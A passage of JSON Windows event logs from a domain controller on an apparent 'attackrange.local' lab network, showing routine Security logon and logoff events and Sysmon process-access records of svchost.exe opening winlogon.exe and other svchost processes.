requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x47324","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220310,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47324\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x47324","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220311,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45685\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x45685","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2532,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2533,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1628\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"1628","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2534,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2240\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x147A\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\themeservice.dll+3de3|c:\\windows\\system32\\themeservice.dll+26c0|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2240","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x147a","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\themeservice.dll+3de3|c:\\windows\\system32\\themeservice.dll+26c0|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2535,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2536,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1628\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"1628","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2537,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2240\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+4689|c:\\windows\\system32\\themeservice.dll+3fdd|c:\\windows\\system32\\themeservice.dll+3c53|c:\\windows\\system32\\themeservice.dll+2675|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2240","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+4689|c:\\windows\\system32\\themeservice.dll+3fdd|c:\\windows\\system32\\themeservice.dll+3c53|c:\\windows\\system32\\themeservice.dll+2675|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2538,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2539,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2540,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 